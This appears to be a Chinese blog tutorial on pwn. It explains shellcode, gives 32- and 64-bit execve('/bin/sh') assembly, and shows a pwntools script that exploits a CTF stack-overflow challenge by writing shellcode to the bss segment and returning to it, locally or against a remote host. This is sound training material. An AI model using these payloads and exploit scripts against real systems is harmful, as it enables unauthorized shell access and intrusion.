安装好了pwntool、ROPgadget、onegadget以及pwngdb,读懂并手写脚本复现了上一篇中基于64位有后门的栈溢出漏洞,恭喜你少年,你已经完成二进制的筑基啦。接下来,我们要介绍的是栈溢出的第二种利用形式:基于shellcode的栈溢出。
在编程语言中要想获得系统执行权限,可以使用system('/bin/sh')。该函数是基于系统函数execve('/bin/sh',0,0),编译为机器码后运行就可以getshell。而shellcode就相当于execve('/bin/sh',0,0)的机器码,如果程序中没有提供类似于system('/bin/sh')这样的后门,那么我们完全可以向一个具有可执行权限的内存区域中传入shellcode来达到同样的效果。
-
32位shellcode编写
32位系统调用命令是int 0x80,execve的调用号是0xb(由eax记录),三个参数'/bin/sh',0,0分别由ebx,ecx和edx记录。
section .text
global _start
_start:
xor ecx,ecx;
xor edx,edx;
xor eax,eax;
push eax;#使得/bin/sh后面出现00,截断字符串
push "//sh";#占位防止出现00
push "/bin";
mov ebx,esp;
mov al,0xb;#直接将0xb赋值给eax高位,防止高位补0
int 0x80;
-
64位shellcode编写
64位系统调用命令是syscall,execve的调用号是59(由rax记录),三个参数'/bin/sh',0,0分别由rdi,rsi和rdx记录。
section .text
global _start
_start:
xor rsi,rsi;
xor rdx,rdx;
xor rbx,rbx;#传入00,便于截断
push rbx;
mov rbx,"/bin//sh";#长度超过32位,只能通过寄存器传参,加/补位
push rbx;
mov rdi,rsp;
mov al,59;
syscall;
以上两种shellcode都是采用系统调用实现execve('/bin/sh',0,0),能理解即可,不用刻意去记。当然不理解也没关系,pwntool中内置了生成shellcode的函数。在32位环境下使用asm(shellcraft.sh()),在64位环境下使用asm(shellcraft.amd64.sh()),即可生成shellcode。
下面给出一道基于shellcode的64位栈溢出例题,结合题目直观了解一下shellcode的使用方法。
可以看到程序中存在两个输入函数,read()和gets()。read输入函数的数据存在name处,且name位于bss段。
gets输入函数的数据则放在栈中,由于对输入长度没有限制,所以存在栈溢出。
当程序没有开启pie时,栈的位置是随机的,但是bss段的地址是固定的。因此本题的思路是在第一个输入函数read()处放shellcode,在第二个输入函数gets()处栈溢出调整到bss段,执行shellcode获取服务权限。
#!/usr/bin/python
#coding=utf-8
from pwn import *
from LibcSearcher import *
local_file = 'level1'
#choose right lib according to the elf
local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so'
#local_libc = '/lib/i386-linux-gnu/libc-2.23.so'
remote_libc = local_libc
is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host, port)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
p.recvuntil("tell me your name\n")
payload=asm(shellcraft.amd64.sh())
p.sendline(payload)
p.recvuntil("What do you want to say to me?\n")
payload="A"*0x28+p64(0x601080)
p.sendline(payload)
p.interactive()
从31行开始进入我们的核心代码。首先接收消息,然后生成shellcode通过read函数写入bss段。再接收消息,在把栈填满后返回地址放置0x601080(bss段地址)实现跳转执行shellcode。
本期二进制学习分享就到这里啦,题目链接可以关注"断剑重铸"公众号查看pwn学习的浇水篇,有问题可随时通过公众号留言哦~文章来源:https://www.toymoban.com/news/detail-475352.html
文章来源地址https://www.toymoban.com/news/detail-475352.html
到了这里,关于二进制学习(pwn)-shellcode的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!